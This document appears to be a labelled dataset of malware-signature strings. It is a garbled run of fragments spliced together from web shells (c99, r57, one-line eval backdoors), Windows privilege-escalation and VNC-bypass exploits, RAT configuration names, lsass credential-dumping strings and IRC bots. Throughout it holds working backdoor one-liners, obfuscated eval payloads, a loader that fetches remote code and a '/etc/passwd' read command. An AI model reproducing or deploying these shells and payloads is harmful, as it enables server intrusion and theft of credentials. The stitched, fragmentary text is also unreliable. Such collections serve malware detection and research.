1 xyzcmd v1.0 for nt s= click here if you want to get your registered copy of aspack; for beginning of translate - copy english.ini into the yourlanguage.inie-mail: shinlan@km169.net; please, translate text only after simbol '='= compress with aspackresponse.write \"<a href='index.asp'>if request.cookies(\"password\")=\"whichdir=server.mappath(request(\"path\"))set fs = createobject(\"scripting.filesystemobject\")whichdir=request(\"path\")hit [enter] to begin command mode...if you are in command mode,[/l] lists all the drives the monitor is currently attached tof
1 passwordchangenotifyvplrxzhtudog2j~ldqpqftk(wou\"isztk)startthreadatwinlogon<
1 00-00-00-00-00-00c:\\users\\ziedpirate.ziedpirate-pc\\desktop\\sop\\sop\\release\\(separate usernames with a comma, or leave blank to monitor all uses.)input usernames here and separate with a comma. leave blank to monitor all users.please enter access password: delivery via email and ftp3
1 updatemutex:response=scanin:update_bunistall_bs_protectp_walletgr_commandftpupload-ip2-post1-post2-udplogin=[1000]&pass=[1000]&password=[50]&log=[50]&passwrd=[50]&user=[50]&username=[50]&vb_login_username=[50]&vb_login_md5password=[50]-timeout-thread local; ru) presto/2.10.289 version/-icmp<xmp>-long99=1x5o!p%@ap[4\\pzx54(p^)7cc)7}$eicar-standard-antivirus-test-file!$h+h*nullsoft
1 vb5chs.dllmsvbvm50.dllsystem.dllset sys=server.createobject (\"system.contral\") public function reboot(atype as variant)t& = exitwindowsex(1, atype)atype=request(\"atype\") aceivex dlldeclare function exitwindowsex lib \"user32\" (byval uflags as long, byval sys.reboot(atype)' -- check for a command that we have posted -- 'sztempfile = \"c:\\\" & ofilesys.gettempname( )<meta http-equiv=\"content-type\" content=\"text/html; charset=gb2312\"><body><input type=text name=\".cmd\" size=45 value=\"<%= szcmd %>\">call oscript.run (\"cmd.exe /c \" & szcmd & \" > \" & sztempfile, 0, true)szcmd = request.form(\".cmd\")%s server.exeservice port: %sthe port must been >0 & <655353--set server portthe server password exceeds 32 charactersservice name: %sserver password: %sinject process name: %swineggdrop shell congiratorerror get globalgroup memebers: nerr_invalidcomputererror get users from server!get in nt by name and nullget something from nt, hold by killusa.logon.exedomain and user:pid=get addr$(): onepsapi.dllkt
1 usage: %s [-h] [-v] [-t target] [-u username] [-p password][assuming one session already existed or target is null.]heapalloc() failed for ansiservererror : fail to enumerate current sessionerror : fail to get session datafail to search lsass datakerberos.dlllivessp.dllwdigest.dlltspkg.dlllsasrv.dlltmp.dat?getmsgproc@@ygjhij@zishkmsjetodb.dll
1 enablelua /t reg_dword /d 0 /f*a01**a02**a03**a04**a05**a06*hostsettingssevane.tmpcmd_.bata2b7c3d7e4cmd.dlldefpathhknamehportipathpanelpathrooturlvirusscanpronoipstreamwebcamdomain_passwordstub.form1.resourcesf
1 30.40.50.60:9342|###[ snmpresponse ]###[+] generating exploit for exec mode pass-disable[+] building payload for mode pass-disable[+] executing: extrabaconappended aaaadminauth_enable payload/bananaglee/eligiblebombprotocol must be either http or https (ex: https://1.2.3.4:1234)
1 saveselectedfiltercmdexecutepasswordchar@wsockhook.dllpsinitialsystemprocess @%ppslookupprocessbyprocessid(%u) failedpslookupprocessbyprocessid(%u) => %pfirststage() loaded, currentthread @%p stack %p - %pdic\\loginlist.txtradmin.exelamescan3.pdf!dic\\passlist.txtqy001service/.mikyc
1 restart with the new protocol, address, and port as target.targetport : %s (%u)error: strchr() could not find '@' in account name.targetacctpwd : %screating curl connection handle...[+] setting password : (null)[-] tbbuffcpy() failed![+] smb negotiation12345678-1234-abcd-ef00-0123456789abvalue must end with 0000 (2 nulls)[*] configuring payload[*] connecting to listener
1 n:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t;<<t;<<t;<<t;<<t;<<t;<<t;<<t;<<t<<<t;<<t;<<t;<<t;<<t;<<t<<<t<<>>><<<c/a/a/b/a/main/start.classcon g/con g.perljava/textito.isnmain.classpkplugins/server.classpkidpkconfig.inipkpassword.inipkloadstub.classpkloadstubdecrypted.classpkloadpassword.classpkdecryptstub.classpkclassloaders.classpkutil/oshelperalienspyconfig.xmlpkkey.classpksvd$1.classpksvd$2.classpkmensaje.classpkinic$shutdownhook.classuninstall.jarpkresources/icono.pngpkbss_serverclick_delay
1 c:\\windows\\system32\\command.com /c easy usage version -- edited by: racle@tian6.comoh,sry.too long command.success! commander.hey,how can racle work without ur command ?the exploit thread was unable to map the virtual 8086 address space[+] usage: vnc_bypauth <target> <scantype> <option>========realvnc <= 4.1.1 bypass authentication scanner=======[+] type vnc_bypauth <target>,<scantype> or <option> for more informationsvnc_bypauth -i 192.168.0.1,192.168.0.2,192.168.0.3,...-vn:%-15s:%-7d connection closedprogram termingwww.icehack.yoda & m.o.d.-> come.to/f2f **************c:\\temp\\$530 please login with user and pass._shell.exeftpcwaitingpassword@members.3322.net/dyndns/update?system=dyndns&hostname=http://www.xxx.com/xxx.exe@ddns.oray.com/ph/update?hostname=listviewprocesslistcolumnclick!http://iframe.ip138.com/ic.aspusage : ms11-080.exe cmd.exe command \\ms11080\\ms11080\\debug\\ms11080.pdb[>] by:mer4en7y@90sec.org[>] create porcess error[>] ms11-080 exploitusage:system_exp.exe \"cmd\"the shell \"cmd\" success!not windows nt family os.unable to get kernel base address.run \"%s\" failed,code: %dwindows kernel local privilege exploit h
1 http/1.0mozilla/5.0 (windows; u; windows nt 5.1; en-us; rv:1.8.0.6) gecko/20060728 firefox/1.5.0.6callback[0]callback[1]callback[2]callback[3]callback[4]mtbtr-dwevckpba.dat+rrror oogin as %sid=%s,oemcp=%d,acp=%d002 termsrv=%d002 inject=%s002 sleep=%d002 cbm=%d002 callback[4]=%s002 callback[3]=%s002 callback[2]=%s002 callback[1]=%s002 callback[0]=%s002 ramfree=%dmb002 ram=%dmb002 cpu=%s002 ipaddress=%s002 password=%s002 time=%s002 oemcp=%d002 os=%s002 group=%d002 image=%d002 name=%s002 nick=%s002 version=%s002 id=%sstartdocazwunmapviewofsectionntunmapviewofsection<%execute request
1 enter your own password here
1 probe #2 usage: %s -i targetip -p targetport -r %d [-o timeout] -t protocol -n imailusername -a imailpassword** runexploit ** - exception_execute_handler : 0x%08xsending implant payload.. cencimplantpayload size(%d)target is not vulnerable** createpayload ** - exception_execute_handlerskip call to packageridearea(). payload has already been packaged. options -x and -q ignored.error: pgvars->pintrideareaimplantpayload is nulldec pathworks tcpip service on windows nt<\\\\__msbrowse__> g<irisnameserver>** sendandreceive ** - exception_execute_handlerbinding to rpc interface %s over named pipeerror: tbmalloc() failed for encoded exploit payload** encodeexploitpayload ** - exception_execute_handlersending implant payload (%d-bytes)error: encoder failed on exploit payloaderror: vulnerableos() != ret_successerror: connection terminated by target (tcp ack/fin)target did not respond within specified amount of time# scan for windows boxesgoing into send# does not workyou are the weakest link, goodbyerpc scan for rpc folksp
\"checked=\\\"checked\\\"\" : \"\";\"<td nowrap>\"+f.canread()+\" / \"+f.canwrite()+\" / \"+f.canexecute()+\"</td>return new double(format.format(value)).doublevalue();file tempf = new file(savepath);if (tempf.isdirectory()) {$bindport_pass = \"c99\"; else {echo \"<b>execution php-code</b>\"; if (empty($eval_txt)) {$eval_txt = tr$res = @mysql_query(\"show create table `\".$_post['mysql_tbl'].\"`\", $d$sql1 .= $row[1].\"\\r\\n\\r\\n\";if(!empty($_post['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }foreach($values as $k=>$v) {$values[$k] = addslashes($v);}body, td, tr {$d=str_replace(\"\\\\\",\"/\",$d);if ($file==\".\" || $file==\"..\") continue;string savepath = request.getparameter(\"savepath\");url downurl = new url(downfileurl);if (util.isempty(downfileurl) || util.isempty(savepath))string downfileurl = request.getparameter(\"url\");fileinputstream finput = new fileinputstream(f);urlconnection conn = downurl.openconnection();sis = request.getinputstream();<meta http-equiv=\"content-type\" content=\"text/html; charset=gb2312\"></head><input type=\"hidden\" name=\"_eventtarget\" value=\"\" /><input type=\"hidden\" name=\"_eventargument\" value=\"\" /><table width=\"100%\" border=\"1\" cellspacing=\"0\" cellpadding=\"5\" bordercol kb </td><table width=\"98%\" border=\"0\" cellspacing=\"0\" cellpadding=\"<!-- <tr align=\"center\"> http://www.4ngel.net</a> | <a href=\"?action=phpenv\">phpecho $msg=@fwrite($fp,$_post['filecontent']) ? 
\"codz by angel$res = @shell_exec($cfe);$res = @ob_get_contents();@exec($cfe,$res);private static final int editfield_rows = 30;private static string tempdir = \".\";<input type=\"hidden\" name=\"dir\" value=\"<%=request.getattribute(\"dir\")%>\"\" <select name='encode' class='input'><option value=''>ansi</option><option valjsession.setattribute(\"msg\",\"<span style='color:red'>upload file failed!</spafile f = new file(jsession.getattribute(current_dir)+\"/\"+filebean.getfilename(((invoker)ins.get(\"vd\")).invoke(request,response,jsession);$handle = @opendir($dir) or die(\"can't open directory $dir\");if(!empty($_post['mysql_db'])) { @mssql_select_db($_post['mysql_db'],$db); }if (!isset($_server['php_auth_user']) || $_server['php_auth_user']!==$name || $_,htaprewop(ecalper=htaprewop:fi dne:0=kotide:1 - eulavtni = eulavtni:neht 1 => ej \"<form action='\"&url&\"?action2=post' method='post' name='editform'><input nerror_reporting(0);session_start();header(\"content-type:text/html;charset=utf-8function fvm(jwv):if jwv=\"\"then:fvm=jwv:exit function:end if:dim tt,sru:tt=\"<option value=\"\"drop table [jnc];exec mast\"&kvp&\"er..xp_regwrite 'hkey_localif qpv=\"\" then qpv=\"x:\\program files\\mysql\\mysql server 5.0\\my.ini\"&br&\">www.expdoor.com</a> <input name=\"filename\" type=\"text\" value=\"asp_ver.asp\" size=\"20\" maxset file=fs.opentextfile(server.mappath(filename),8,true) 'set fs=server.createobject(\"scripting.filesystemobject\") '<title>expdoor.com asp<?php $s=@$_get[2];if(md5($s.$s)==<%eval(request(chr(112))):set fso=createobject$i = pack('c*', 0x70, 0x61, 99, 107); 'h' => $i('h*', '687474703a2f2f626c616b696e2e64756170702e636f6d2f7631'),//http://require.duapp.com/session.phpif(!isset($_session['t'])){$_session['t'] = $globals['f']($globals['h']);}//define('pass','123456');$globals['c']($globals['e'](null, $globals['s']('%s',$globals['p']('h*',$_sessiovoid aa(stringbuffer sb)throws exception{file r[]=file.listroots();for(int 
i=0;ibw.write(z2);bw.close();sb.append(\"1\");}else if(z.equals(\"e\")){ee(z1);sb.appif(z.equals(\"a\")){string s=new file(application.getrealpath(request.getrequest// web shell!!@preg_replace(\"/.*/e\",\"\\x65\\x76\\x61\\x6c\\x28\\x67\\x7a\\x69\\x6e\\x66\\x6$default_charset = \"utf-8\";// url:http://www.weigongkai.com/shell/if (strpos($_server['http_user_agent'], 'ebsd') == false) {setcookie('key', $_post['pwd'], time() + 3600 * 24 * 30);$_session['code'] = _request(sprintf(\"%s?%s\",pack(\"h*\",'6874if (preg_match(\"/^http\\/\\d\\.\\d\\s([\\d]+)\\s.*$/\", $status, $matches))eval(gzuncompress(gzuncompress(crypt::decrypt($_session['code'], $_cif (($fsock = fsockopen($url2['host'], 80, $errno, $errstr, $fsock_timeout))if(is_readable($path)) antivirus($path.'/',$exs,$matches);'/(eval|assert|include|require|include\\_once|require\\_once|array\\_map|arr'/(exec|shell\\_exec|system|passthru)+\\s*\\(\\s*\\$\\_(\\w+)\\[(.*)\\]\\s*'/(include|require|include\\_once|require\\_once)+\\s*\\(\\s*[\\'|\\\"](\\w+'/\\$\\_(\\w+)(.*)(eval|assert|include|require|include\\_once|require\\_oncemail: chinese@hackermail.comif($_get[\"hackers\"]==\"2b\"){if ($_server['request_method'] == 'post') { echo site: http://blog.weili.me<a class=\"high2\" href=\"javascript:;;;\" name=\"action=show&dir=$_ipage_fi$file = !empty($_post[\"dir\"]) ? 
urldecode(self::convert_to_utf8(rtrim($_poif (true==@move_uploaded_file($_files['userfile']['tmp_name'],self::convert_processed in <span id=\"runtime\"></span> second(s) {gzip} usage:<a href=\"javascript:;;;\" name=\"{return_link}\" onclick=\"fileperm<%@page import=\"java.io.*\"%><%if(request.getparameter(\"f\")<?php eval($_post[1]);?> <%@page import=\"java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*\"%><%!s<[url=mailto:?@array_map($_get[]?@array_map($_get['f'],$_get[/url]);?>:https://forum.90sec.org/forum.php?mod=viewthread&tid=7316@preg_replace(\"/f/e\",$_get['u'],\"fengjiao\"); qq(cs, z1, z2, sb,z2.indexof(\"-to:\")!=-1?z2.substring(z2.indexof(\"-to:\")+4,zsb.append(l[i].getname() + \"/\\t\" + st + \"\\t\" + l[i].length()+ \"\\t\" + sqresultset r = s.indexof(\"jdbc:oracle\")!=-1?c.getmetadata()return drivermanager.getconnection(x[1].trim()+\":\"+x[4],x[2].equalsignorecase(sod=array(\"d\",\"7\",\"s http://www.baidu.com/fuck.asp?a=)0(tseuqer%20lave <% a=request(chr(97)) executeglobal(strreverse(a)) %>array_map(\"asx73ert\",(arpreg_replace(\"/[errorpage]/e\",$page,\"saft\");shell.php?qid=zxexp <?php array_map(\"ass\\x65rt\",(array)$_request['expdoor']);?><?php eval(str_rot13('riny($_cbfg[cntr]);'));?><?$_uu=chr(99).chr(104).chr(114);$_cc=$_uu(101).$_uu(118).$_uu(97).$_uu(108).$_uecho \"<font color=blue>error!</font>\";<input type=\"text\" size=61 name=\"f\" value='<?php echo $_server[\"script_file - expdoor.com</title>$f=fopen($_post[\"f\"],\"w\");<textarea name=\"c\" cols=60 rows=15></textarea><br>execute morficoder(\")/*/z/*/(tseuqer lave\")function morficoder(code)morficoder=replace(replace(strreverse(code),\"/*/\",\"\"\"\"),\"\\*\\\",vbcrlf)my @adms=(\"kelserific\",\"puna\",\"nod32\")#acesso a shel - 1 on 0 offhttp://michaeldaw.org 2006or http://<? 
echo $server_name.$request_uri; ?>?d=c:/windows on wincoded by z0mbie<option value=\"cat /var/cpanel/accounting.log\">/var/cpanel/accounting.log</optliz0zim private safe mode command execuriton bypassecho \"<b><font color=red>kimim ben :=)</font></b>:$uid<br>\";echo \"command : <input type=text name=cmd value=\".@stripslashes(htmlentities($if(!$whoami)$whoami=exec(\"whoami\"); echo \"whoami :\".$whoami.\"<br>\";shankar<input type=checkbox name='dd' \".(isset($_post['dd'])?'checked':'').\">db<inputshow<input type=text size=5 value=\".((isset($_post['br_st']) && isset($_post['bcopy ( $dosya_gonder2, \"$dir/$dosya_gonder2_name\") ? print(\"$dosya_gonder2_naecho \"<center><font size='$sayi' color='#ffffff'>hacklerin<font color='#008000'value='calistirmak istediginiz eval(gzinflate(base64_decode('fjzhkqpatku/550ignjxxhvv6bzae0ie5+svfvgtkqxmzq05x1shellbotpacktsgr0upcorporation# servidor de irc que vai ser usado /^ctcpflood\\s+(\\d+)\\s+(\\s+)$succ = \"warning! don`t be stupid .. this is a priv3 server, so take extra care!\\*=-- members area --=*/preg_match('/(\\n[^\\n]*){' . $cache_lines . '}$/', $_session['ocr4sh_aka_rklngh edition/* connectback-backdoor on perl<form action=<?=$script?>?act=bindshell method=post>$logo = \"r0lgodlhmaawaoyaaaaaap////r// backdoor.jspjsp backdoor reverse shellmailto:rhfactor@antisocial.com?raiz=rootdigo corrompido<br>corrupt codekey = \"5dcadac1902e59f7273e1902e5ad8414b1902e5abf3e661902e5b554fc41902e53205ca0ntdaddy v1.9 by obzerve of fux0r inc<error: this is not a text file>raw d.o.s. 
command interfacesimattacker - vrsion : 1.0.0 - priv8 4 my friend fputs ($fp ,\"\\n*********************************************\\nwelcome t0 simecho \"<a target='_blank' href='?id=fm&fedit=$dir$file'><span style='text-decora<title>remote explorer</title> fso.copyfile request.querystring(\"folderpath\") & request.querystring(\"copyfi<td bgcolor=\"<%=bgcolor%>\" title=\"<%=file.name%>\"> <a href= \"showcode.asp?f{mkdir(\"$dizin/$duzenx2\",777)$baglan=fopen($duzkaydet,'w');phvayv 1.0set aktifklas=request.querystring(\"aktifklas\")action=\"klasvayv.asp?klasorac=1&aktifklas=<%=aktifklas%>&klas=<%=aktifklas%><font color=\"#858585\">www.aventgrup.netstyle=\"background-color: #95b4cc; border-bottom: #000000 1px inset; border-leftr57shell else if ($http_post_vars['with'] == \"lynx\") { $http_post_vars['cmd']= \"lynx rush security team'ru_text12' => 'back-connectc:\\tmp\\dump_rst mysqlhttp://rst.void.ru$st_form_bg='r0lgodlhcqajaiaaaofo6u7w8yh5baaaaaaalaaaaaajaakaaaipjaonujfnhjh0qtfw0lcvads=';#use: python wh_bindshell.py [port] [password]python -c\"import md5;x=md5.new('you_password');print x.hexdigest()\"#bugz: ctrl+c etc =script stoped=network security team :: cgi shell#########################<<konec>>#######################################if (!defined$param{pwd}){$param{pwd}='enter_password'};##eval(gzinflate(base64_decode('hj3hkqnqeku/zzqcbd4t8v4yaqi2e3jvpv8/1gw6orsvflyxef//$message.= \"--{$mime_boundary}\\n\" .\"content-type: {$fileatt_type};\\n\" .$ftpconnect = \"ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplogmove_uploaded_file($userfile, \"entrika.php\"); send this file: <input name=\"userfile\" type=\"file\"><input type=\"hidden\" name=\"max_file_size\" value=\"100000\">w a r n i n g: private server$message = q$<pre><font color=\"#669999\"> _____ _____ _____ _____ w3d shellby: warpboyno query executedwebshell.cgi<td><code class=\"entry-[% if entry.all_rights %]mine[% elsewinx shellcreated by greenwood from n57<td><font color=\\\"#990000\\\">win 
dir:</font></td>$def_ports=array (1=>'tcpmux (tcp port service multiplexer)',2=>'management util$ra44 = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_server['http.::[c0derz]::. web-shellhttp://c0derz.org.uavint21h@c0derz.org.ua$name='63a9f0ea7bb98050796b649e85481845';//rootnews remote php shell injectionphp shell <br /><input type = \"text\" name = \"url\" value = \"codz by angel(4ngel)web: http://www.4ngel.net$admin['cookielife'] = 86400;$errmsg = 'the file you want downloadable was nonexistent';$res .= '<td align=\"center\"><a href=\"'.$xshell.'?act=chmod&file='.$_session[ak-74 security team web site: www.ak74-team.net$php=\"/* line 1 */\\n\\n// \".mm(\"for example, uncomment next line\").\"welcome to phpremoteview (remview)pysystemstate.initialize(system.getproperties(), null, argv);public class jythonshell extends jpanel implements runnable {public static int default_scrollback = 100drmist.ruhidden(\"action\",\"download\").hidden_pwd().\"<center><table><tr><td width=80stnc webshellhttp://www.security-teams.net/index.php?showtopic=azrailphp<br><center><input type='submit' name='dy' value='dosya yolla!'></center><center><input type='submit' name='okmf' value='tamam'></center>;$sd98=\"john.barker446@gmail.com\"print \"sending mail to $to....... \";<td colspan=\"2\" width=\"715\" background=\"/simparts/images/cellpic1.gif\" hei$dump_file.='`'.$rows2[0].'`filename=\\\"dump_{$db_dump}_${table_dcmdasp.asp-- use a poor man's pipe ... 
a temp file --maceo @ dogmile.com<!-- simple php backdoor by dk (http://michaeldaw.org) -->usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwdsoomin kimsmkim@popeye.snu.ac.krecho \"<td><a href='$php_self?action=deletedata&dbname=$dbname&tablename=$tablenemperor hacking teamsimshell<form name=\"shell\" action=\"<?php echo $_server['php_self'] ?>\" method=\"post[url=http://www.governmentsecurity.orgperl asmodeus.pl client 6666 127.0.0.1print \"asmodeus perl remote shell$internet_addr = inet_aton(\"$host\") or die \"aloa:$!\\n\";#phpmyadmin mysql-dump;db_connect();header('content-type: application/octetstr$data .= \"#database: $databasemehdi & holydemonwww.infilak.'*t@*r@#@&mms^pdbybvubcaaa==^#~@%><form method=post name=inf><table width=\"75%<title>[additinal tittle]-phpshell by:[yourname]<?php echo phpshell_version ?></href=\"mailto: [you can enter your mail here]- [additional text]</a></i>@chdir($work_dir) or ($shelloutput = \"myshell: can't change directory.echo \"<font color=$linkcolor><b>myshell file editor</font> file:<font color $fileeditinfo = \"&nbsp;&nbsp;:::::::&nbsp;&nbsp;owner: <font color=$simorgh security magazine simshell.css} elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_request['command'], www.simorgh-ev.comkj021320case 't':systemtools(out);break;out.println(\"<tr><td>\"+ico(50)+f[i].getname()+\"</td><td> file<die(\"couldn't read directory, blocked!!!\");php web shellshells.dl.amthis server has been infected by $owner<input type=\"submit\" value=\"include!\" name=\"inc\"></p>could not write to file! 
(maybe you didn't enter any text?)#we are: masterkid, alexutz, fatman & mikutul echo --==userinfo==-- ; id;echo;echo --==directory==-- ; pwd;echo; echo --==shelconnectback backdoortarget fi1e:<br><input type=\"text\" name=\"target\" value=\"index.php\"></br>eval(base64_decode(\"zxzhbchiyxnlnjrfzgvjb2rlkcjhv2r1yjnkbfgzvnpawepmwvdkdmnuuw9<img src=\"http://s43.radikal.ru/i101/1004/d8/ced1f6b2f5a9.png\" align=\"center$back_connect_p=\"iyevdxnyl2jpbi9wzxjsdqp1c2ugu29ja2v0ow0kjglhzgrypwluzxrfyxrvbiecho '<h1>execution php-code</h1><div class=content><form name=pf method=posecho \"[dir] <a href=\\\"\".$_server['php_self'].\"?rep=\".realpath($rep.\"..class backdoor {echo \"<a href=\\\"\".$_server['php_self'].\"?copy=1\\\">copier un fichier</a> <if int((1-0+1)*rnd+0)=0 then makeemail=maketext(8) & \"@\" & maketext(8) & \".\"<form name=frmcmd method=post action=\"<%=gurl%>\">dim zombie_array,special_arrayhttp://vnhacker.orgd7nd7l.km4snk`jzknd{n_ejq;bd{kbpur#kq8aaa==^#~@%>></td><td><input type=\"submitprint \"\\n\".'<tr><td width=100pt class=linelisting><nobr>post (php eval)</td><dizin</font></b></font><font face=\"verdana\" style=\"font-size: 8pt\"><s72 shell v1.0 codinf by cr@zy_kingecho \"<p align=center>dosya zaten bulunuyor</p>\"<?$d='g7mhwq9vvxil/qx2oz2vtdpo6g3fyaa6x+8dmizcd0ehzabzh7jfpzzuz7xnenxsyvbp2wy36ukacak fso 1.0if request.querystring(\"tgh\") = \"1\" then<font color=\"#858585\">buqx</font></a></font><font face=\"verdana\" style=mailto:buqx@hotmail.comlord of iran hackers sabotagelord-c0d3r-nt$port = base_convert(bin2hex(substr($reqmessage[$id], 3+$reqlen+1, 2)), 16, 10);# [+] domain name address typewww.antichat.rucan't open file, permission denidehas been already loaded. 
php emperor <xb5@hotmail.action=mysqlread&mass=loadmass\">load all defaultsif (@passthru($cmd)) { echo \" -->\"; $this->output_state(1, \"passthruprint \"<tr><td><b>server is:</b></td><td>\".$_server['server_signature'].\"</tdprint \"<tr><td><b>execute command:</b></td><td><input size=100 name=\\\"_cmdcoded by n0 [nzer0] www.cyberlords.netu29mdhdhcmuaqwrvymugsw1hz2vszwfkexhjztwaaaamuexurf///waaajmzzaaaacjourkaaaaereturn \"<br>dump error! can't write to \".htmlspecialchars($file);call os.run(\"win.com cmd.exe /c del \"& sztf,0,true)<div align=\"left\"><font size=\"1\">input command :</font></div><input type=\"text\" name=\"cmd\" size=\"30\" class=\"input\"><br><input type=\"text\" name=\"dir\" size=\"30\" value=\"<? passthru(\"pwd\"); ?>ayyildiztouch by ijoofirst we check if there has been asked for a working directoryhttp://ayyildiz.org/images/whosonline2.gifejder was here*~pu*&bp[_)f!8c2f*@#@&~,p~p,~p&q~8bpms~9~~lb~x`v,_,f&*~,jcw~~[_c3trffzq@#@&pp,~~lama's'hellif($_post['king'] == \"\") {if (move_uploaded_file($_files['fila']['tmp_name'], $curdir.\"/\".$_files['fnewhtml = '<b>file browser is under construction! use at your own risk!</b> <br>empty command..type \\\"shellhelp\\\" for some ehh...helpnewhtml = '<font size=0><b>this will reload the page... :(</b><br><br><form enctjspwebshellcreateanddeletefolder is error:<td width=\"70%\" height=\"22\">&nbsp;<%=env.queryhashtable(\"java.cstring _password =\"111\";$baglan=fopen(\"/tmp/$ekinci\",'r');$tampon4=$tampon3-1@aventgrup.net$yazi = \"test\" . 
\"\\r\\n\";fwrite ($fp, \"$yazi\");$entry_line=\"hacked by entrika\";sh_out=os.popen(shell+\" \"+cmd).readlines()# d00r.py 0.3a (reverse|bind)-shell in python by fqprint \"error; help: head -n 16 d00r.py\"print \"pw:\",pw,\"port:\",port,\"host:\",host$error_text = '<strong>failed selecting database \"'.$this->db['<div align=\"center\">the backup process has now started<br </a><a href='\"&dosyapath&\"?status=10&dpath=\"&f1.path&\"&path=\"&path&\"&time=<input type=submit value=\"test et!\" onclick=\"$ar_file=array('/etc/passwd','/etc/shadow','/etc/master.passwd','/etc/fstab','/eshow <input type=text size=5 value=\".((isset($_post['br_st']))?$_post['br_st']:echo \"fichier telecharge dans \".good_link(\"./\".$_files[\"fic\"][\"naif(move_uploaded_file($_files[\"fic\"][\"tmp_name\"],good_link(\"./\".$_fiecho \"cliquez sur un nom de fichier pour lancer son telechargement. cliquez s$dl=$_request['download'];else shell(\"perl.exe $name $port\");fputs ($fp, \"# rst mysql tools\\r\\n# home page: http://rst.void.ru\\r\\n#a cgi by fuzzyman\"\"\"+fontline +\"version : \" + versionstring + \"\"\", running on : \"\"\" + values = map(lambda x: x.value, theform[field]) # allows for<title>ru24postwebshell - \".$_post['cmd'].\"</title>if ((!$_post['cmd']) || ($_post['cmd']==\"\")) { $_post['cmd']=\"id;pwd;uname -awrited by dreamerzr3v3ng4ns\\ndigiteif(!@opendir($chdir)) $ch_msg=\"dtool: line 1: chdir: it seems that the permissiif (empty($cmd) and $ch_msg==\"\") echo (\"comandos exclusivos do dtool pro\\n0ldw0lfhowever you are lucky :pi'm fuckedioctl($client{$client}->{shell}, &tiocswinsz, $winsize);#atrix@irc.brasnet.org$dataout .= \"<td><a href='$myloc?$sreq&incdbhost=$myhost&incdbuser=$myuser&incdif($run == 1 && $phpshellapp && $phpshellhost && $phpshellport) $stroutput .= dbsafe0verscript gecisi tamamlayamadi!document.write(unescape('%3c%68%74%6d%6c%3e%3c%62%6f%64%79%3e%3c%53%43%52%49%50%/* we have found the parent dir. 
we must be carefull if the parent $tmpfile = tempnam('/tmp', 'phpshell');if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {www.rohitab.comprint \"set-cookie: savedpwd=;\\n\"; # remove password cookie$prompt = $winnt ? \"$currentdir> \" : \"[admin\\@$servername $cwww.ironwarez.info$cookiename = \"wieeeee\";~ shell iwww.rootshell-team.infosetcookie($cookiename, $_post['pass'], time()+3600);www.victime.com/index.php?page=http://emplacement_de_la_backdoor.php , ou en tanprint(\"<br>provenance du mail : <input type=\\\"text\\\" name=\\\"provenancif mcolformelem.exists(lcase(sindex)) then form = mcolformelem.item(lcase(sindex))session(\"shagman\")=// note that linux = cmd and windows = \"cmd.exe /c + cmd\" h4ntu shellsystem(\"$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp\");set entrika = entrika.createtextfile(\"c:\\net.vbs\", true)http://www35.websamba.com/cybervurgun/>[*] safemode mode run</div>$file1 - $file2 - <a href=$script_name?$query_string&see=$file>$file</a><br>[*] spawning shellcha0shttp://popeye.snu.ac.kr/~smkim/mysqlhref='$php_self?action=dropfield&dbname=$dbname&tablename=$tablename<th>type</th><th>&nbspm&nbsp</th><th>&nbspd&nbsp</th><th>unsigned</th><th>zerofi<title>g-security webshell</title><input type=text name=\"-cmd\" size=64 value=\"<?=$cmd?>\" <? if($cmd != \"\") print shell_exec($cmd);?><? 
$cmd = $_request[\"-cmd\"];?>echo \"<b>changing file-mode (\".$d.$f.\"), \".view_perms_color($d.$f).\" (\"echo \"<td>&nbsp;<a href=\\\"\".$sql_surl.\"sql_act=query&sql_query=\".ur<tr><form method=post><td><font color=red><b>back connect:</b></font></td><td><i$perl_proxy_scp = \"iyevdxnyl2jpbi9wzxjsicancimhl3vzci91c2mvcgvybc81ljawnc9iaw4v<tr><form method=post><td><font color=red><b>backdoor:</b></font></td><td><input.textbox { background: white; border: 1px #000000 solid; color: #000099; font-fa<input class='inputbox' type='text' name='pass_de' size=50 onclick=this.value=''echo \"<hr size=\\\"1\\\" noshade><b>done!</b><br>total time (secs.): \".$ft$fqb_log .= \"\\r\\n------------------------------------------\\r\\ndone!\\r'eng_text71'=>\"second commands param is:\\r\\n- for chown - name of new owner oif(!empty($_post['s_mask']) && !empty($_post['m'])) { $sr = new searchresult\"aaaaach5baeaaakalaaaaaauabqaaar0mmljqyzfalqeqjugeqscnwg6fogpkhamf4hajswh7/ze\"\"mtp/zdp//2yaagyam2yazmyamwyazgya/2yzagyzm2yzzmyzmwyzzgyz/2zmagzmm2zmzmzmmwzm\"\"r0lgodlhfaauakl/ap/4/8dawh9/ap/4al+/vwaaaaaaaaaaach5baeaaaealaaaaaauabqaqamo\"echo $te.\"<div align=center><textarea cols=35 name=db_query>\".(!empty($_post['echo sr(45,\"<b>\".$lang[$language.'_text80'].$arrow.\"</b>\",\"<select name=db> if ($copy_unset) {foreach($sess_data[\"copy\"] as $k=>$v) {unset($sess_data[\" if (file_exists($mkfile)) {echo \"<b>make file \\\"\".htmlspecialchars($mkfile echo \"<center><b>mysql \".mysql_get_server_info().\" (proto v.\".mysql_get_pr elseif (!fopen($mkfile,\"w\")) {echo \"<b>make file \\\"\".htmlspecialchars($m$sess_data[\"cut\"] = array(); c99_sif ((!eregi(\"http://\",$uploadurl)) and (!eregi(\"https://\",$uploadurl))c99sh_sqlqueryelse {$act = \"f\"; $d = dirname($mkfile); if (substr($d,-1) != directory_sepaelse {echo \"<b>file \\\"\".$sql_getfile.\"\\\":</b><br>\".nl2br(htmlspec'ru_text9' =>'???????? ????? ? ???????? ??? ? 
